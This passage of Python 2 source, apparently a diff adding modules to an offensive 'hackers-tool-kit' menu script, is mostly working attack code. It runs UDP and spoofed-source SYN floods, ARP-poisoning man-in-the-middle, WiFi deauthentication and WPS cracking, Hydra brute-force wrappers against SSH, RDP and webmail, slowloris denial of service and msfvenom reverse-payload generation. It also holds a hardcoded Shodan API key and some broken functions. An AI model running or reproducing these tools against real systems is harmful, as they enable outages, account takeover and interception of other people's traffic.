\/\033[1;m''' + target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') + if 'http' in target: + parsed_uri = urlparse(target) + domain = '{uri.netloc}'.format(uri=parsed_uri) + else: + domain = target + try: + br.open('http://' + target) + target = 'http://' + target + except: + target = 'https://' + target + + def sqli(url): + print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run + br.open('https://suip.biz/?act=sqlmap') + br.select_form(nr=0) + br.form['url'] = url + req = br.submit() + result = req.read() + match = search(r"---(?s).*---", result) + if match: + print '%s One or more parameters are vulnerable to SQL injection' % good + option = raw_input( + '%s Would you like to see the whole report? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + print '\033[1;31m-\033[1;m' * 40 + print match.group().split('---')[1][:-3] + print '\033[1;31m-\033[1;m' * 40 + else: + print '%s None of parameters is vulnerable to SQL injection' % bad + + + def cms(domain): + try: + result = br.open('https://whatcms.org/?s=' + domain).read() + detect = search(r'class="nowrap" title="[^<]*">', result) + WordPress = False + try: + r = br.open(target + '/robots.txt').read() + if "wp-admin" in str(r): + WordPress = True + except: + pass + if detect: + print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) + detect = detect.group().split('">')[1][:-27] + if 'WordPress' in detect: + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + elif WordPress: + print '%s CMS Detected : WordPress' % info + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + else: + print '%s %s doesn\'t seem to use a CMS' % (info, domain) + except: + pass + + def honeypot(ip_addr): + result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} + honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr + try: + phoney = br.open(honey).read() + if float(phoney) >= 0.0 and float(phoney) <= 0.4: + what = good + else: + what = bad + print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) + except KeyError: + print '\033[1;31m[-]\033[1;m Honeypot prediction failed' + + def whoisIt(url): + who = "" + print '{} Trying to gather whois information for {}'.format(run,url) + try: + who = str(whois.whois(url)).decode() + except Exception: + pass + test = who.lower() + if "whoisguard" in test or "protection" in test or "protected" in test: + print '{} Whois Protection Enabled{}'.format(bad, end) + else: + print '{} Whois information found{}'.format(good, end) + try: + data = json.loads(who) + for key in data.keys(): + print "{} :".format(key.replace("_", " ").title()), + if type(data[key]) == list: + print ", ".join(data[key]) + else: + print "{}".format(data[key]) + except ValueError: + print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) + pass + + def nmap(ip_addr): + port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr + result = br.open(port).read() + result = sub(r'Starting[^<]*\)\.', '', result) + result = sub(r'Service[^<]*seconds', '', result) + result = os.linesep.join([s for s in result.splitlines() if s]) + print result + + def bypass(domain): + post = urlencode({'cfS': domain}) + result = br.open( + 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() + + match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) + if match: + bypass.ip_addr = match.group().split(' ')[1][:-1] + print '%s Real IP Address : %s' % (good, bypass.ip_addr) + + def dnsdump(domain): + res = DNSDumpsterAPI(False).search(domain) + print '\n%s DNS Records' % good + for entry in res['dns_records']['dns']: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + for entry in res['dns_records']['mx']: + print '\n%s MX Records' % good + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n\033[1;32m[+]\033[1;m Host Records (A)' + for entry in res['dns_records']['host']: + if entry['reverse_dns']: + print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) + else: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n%s TXT Records' % good + for entry in res['dns_records']['txt']: + print entry + print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) + + + def fingerprint(ip_addr): + try: + result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() + match = search(r'"os_description": "[^<]*"', result) + if match: + print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) + except: + pass + + + ip_addr = socket.gethostbyname(domain) + print '%s IP Address : %s' % (info, ip_addr) + try: + r = requests.get(target) + header = r.headers['Server'] + if 'cloudflare' in header: + print '%s Cloudflare detected' % bad + bypass(domain) + try: + ip_addr = bypass.ip_addr + except: + pass + else: + print '%s Server: %s' % (info, header) + try: + print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) + except: + pass + try: + r.headers['X-Frame-Options'] + except: + print '%s Clickjacking protection is not in place.' % good + except: + pass + fingerprint(ip_addr) + cms(domain) + try: + honeypot(ip_addr) + except: + pass + print "{}----------------------------------------{}".format(red, end) + whoisIt(domain) + try: + r = br.open(target + '/robots.txt').read() + print '\033[1;31m-\033[1;m' * 40 + print '%s Robots.txt retrieved\n' % good, r + except: + pass + print '\033[1;31m-\033[1;m' * 40 + nmap(ip_addr) + print '\033[1;31m-\033[1;m' * 40 + dnsdump(domain) + os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) + try: + br.open(target) + print '%s Crawling the target for fuzzable URLs' % run + for link in br.links(): + if 'http' in link.url or '=' not in link.url: + pass + else: + url = target + '/' + link.url + params.append(url) + if len(params) == 0: + print '%s No fuzzable URLs found' % bad + quit() + print '%s Found %i fuzzable URLs' % (good, len(params)) + for url in params: + print url + sqli(url) + url = url.replace('=', '') + r = br.open(url).read() + if '' in r: + print '%s One or more parameters are vulnerable to XSS' % good + break + print '%s These are the URLs having parameters:' % good + for url in params: + print url + except: + pass +def sysinfo(): + os.system("iwconfig") + k = raw_input("Interface: ") + os.system("clear") + os.system("ifconfig") + os.system("iwconfig") + os.system("neofetch") + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) + show = 'macchanger -s {0}'.format(k) + os.system(show) +def msfex(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show exploits'""") +def udp(): + target = raw_input(N+"Target:\033[91m ") + ip = socket.gethostbyname(target) + port = input(N+"Port:\033[91m ") + os.system("service tor restart") + print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) + os.system("sleep 2s") + sent = 0 + print "KILLING %s CONNECTIONS"%(ip) + while True: + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) + if port == 65534: + port = 1 +def tcp(): + print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" + print "\n" + tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") + print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" + os.system("sleep 5") + os.system("python /root/hackers-tool-kit/tools/" + tcp) +def syn(): + def randomIP(): + ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) + return ip + + def randInt(): + x = random.randint(1000,9000) + return x + + def SYN_Flood(dstIP,dstPort,counter): + total = 0 + print "Packets are sending ..." + for x in range (0,counter): + s_port = randInt() + s_eq = randInt() + w_indow = randInt() + + IP_Packet = IP () + IP_Packet.src = randomIP() + IP_Packet.dst = dstIP + + TCP_Packet = TCP () + TCP_Packet.sport = s_port + TCP_Packet.dport = dstPort + TCP_Packet.flags = "S" + TCP_Packet.seq = s_eq + TCP_Packet.window = w_indow + + send(IP_Packet/TCP_Packet, verbose=0) + total+=1 + sys.stdout.write("\nTotal packets sent: %i\n" % total) + + + def info(): + + dstIP = raw_input ("\nTarget IP : ") + dstPort = input ("Target Port : ") + + return dstIP,int(dstPort) + + + def main(): + dstIP,dstPort = info() + counter = input ("Packets : ") + SYN_Flood(dstIP,dstPort,int(counter)) + + main() + +def ping(): + p = raw_input("Enter Host: ") + os.system("ping " + p) +def msfpa(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show payloads'""") +def msfau(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show auxiliary'""") +def multih(): + os.system("service postgresql start") + os.system("""msfconsole -x 'use multi/handler'""") +def msfall(): + os.system("service postgresql start") + os.sytem("""msfconsole -x 'show all'""") +def hydra(): + """ + This program is just a small program to shorten brute force sessions on hydra :) + But to be more satisfying results of the brute force. You better interact directly with hydra, + without having to use this black hydra console first: '). + If you find any errors in running our program. Can chat via facebook :). + Hydra is needed for the process of this program :). + """ + import sys, os, time + + # Restart #################### + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() +def cupp(): + os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") + print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" +def vdir(): + print "\n" + os.system("ls") + print Y+"! doesnt have to be these can be any directory !\033[0m" + print "\n" + h = raw_input("Directory Path: ") + print "\n" + print "--------------------------------------------------------------------------------------------------------------------------------------------" + os.system("ls " + h) + print "--------------------------------------------------------------------------------------------------------------------------------------------" + +def monoff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) +def vpn(): + os.system("anonsurf start") + os.system("anonsurf myip") +def vpnoff(): + os.system("anonsurf stop") + os.system("anonsurf myip") +def slowl(): + de = raw_input("Delay: ") + tar = raw_input("RHOST: ") + port = raw_input("RPORT: ") + soc = raw_input("Sockets: ") + os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') + os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) + os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) + os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) + os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) + os.system('echo "run\n" >> slowl.rc') + os.system('msfconsole -r slowl.rc') + os.system('rm -rf slowl.rc') + +def pidox(): + print Y+"! USING FIREFOX !\033[0m" + os.system("sleep 2") + os.system("firefox https://pipl.com/") +def specnet(): + jk = raw_input("BSSID: ") + kj = raw_input("ESSID: ") + os.system("iwconfig") + k = raw_input("INTERFACE: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) + if j == "n": + a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) +def pingen(): + j = raw_input("Enter BSSID: ") + a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) + os.system(a) +def reaver(): + os.system("iwconfig") + j = raw_input("Select Interface: ") + k = raw_input("Enter BSSID: ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) +def deauth(): + print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" + j = raw_input("Enter BSSID> ") + os.system("iwconfig") + k = raw_input("Enter Interface> ") + a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) + os.system(a) +def macc(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +def macoff(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +def arppois(): + + try: + os.system("iwconfig") + interface = raw_input("[*] Enter Interface: ") + victimIP = raw_input("[*] Enter Victim IP: ") + gateIP = raw_input("[*] Enter Router IP: ") + except KeyboardInterrupt: + print "\n[*] User Requested Shutdown" + print "[*] Exiting..." + os.system("clear") + mainbanner() + + print "\n[*] Enabling IP Forwarding...\n" + os.system("echo 1 > /proc/sys/net/ipv4/ip_forward") + + def get_mac(IP): + conf.verb = 0 + ans, unans = srp(Ether(dst = "ff:ff:ff:ff:ff:ff")/ARP(pdst = IP), timeout = 2, iface = interface, inter = 0.1) + for snd,rcv in ans: + return rcv.sprintf(r"%Ether.src%") + + def reARP(): + + print "\n[*] Restoring Targets..." + victimMAC = get_mac(victimIP) + gateMAC = get_mac(gateIP) + send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = victimMAC), count = 7) + send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = gateMAC), count = 7) + print "[*] Disabling IP Forwarding..." + os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") + print "[*] Shutting Down..." + os.system("clear") + mainbanner() + + def trick(gm, vm): + send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst= vm)) + send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst= gm)) + + def mitm(): + try: + victimMAC = get_mac(victimIP) + except Exception: + os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") + print "[!] Couldn't Find Victim MAC Address" + print "[!] Exiting..." + os.system("clear") + mainbanner() + try: + gateMAC = get_mac(gateIP) + except Exception: + os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") + print "[!] Couldn't Find Gateway MAC Address" + print "[!] Exiting..." + os.system("clear") + mainbanner() + print "[*] Poisoning Targets..." + while 1: + try: + trick(gateMAC, victimMAC) + time.sleep(1.5) + except KeyboardInterrupt: + reARP() + break + mitm() +def sslscan(): + j = raw_input('Enter Target: ') + a = 'sslscan {0}'.format(j) + os.system(a) +def payload(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + print "\n" + f = raw_input("Select Payload: ") + l = raw_input("LHOST: ") + c = raw_input("LPORT: ") + os.system("cat /root/hackers-tool-kit/tools/formats.txt") + s = raw_input("Format: ") + h = raw_input("File Name: ") + a = 'msfvenom -p {0} LHOST={1} LPORT={2} -f {3} -o /root/{4}.{5}'.format(f,l,c,s,h,s) + os.system(a) +def crunch(): + print "minimal number of characters" + j = raw_input("[CRUNCH]: ") + print "maximum number of characters" + k = raw_input("[CRUNCH]: ") + print "what characters should be in it" + b = raw_input("[CRUNCH]: ") + print "name of file" + s = raw_input("[CRUNCH]: ") + a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) + os.system(a) + print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s +def traff(): + os.system("iwconfig") + s = raw_input("Select Interface: ") + os.system("tcpdump -i " + s) +def resa(): + j = raw_input("USERNAME: ") + k = raw_input("NEW PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'echo "{0}:{1}" | chpasswd'.format(j,k) + print "password for {0} has been reset".format(j) +def resu(): + j = raw_input("PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'passwd {0}'.format(j) + print "unix password has been reset".format(j) +def hashid(): + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + 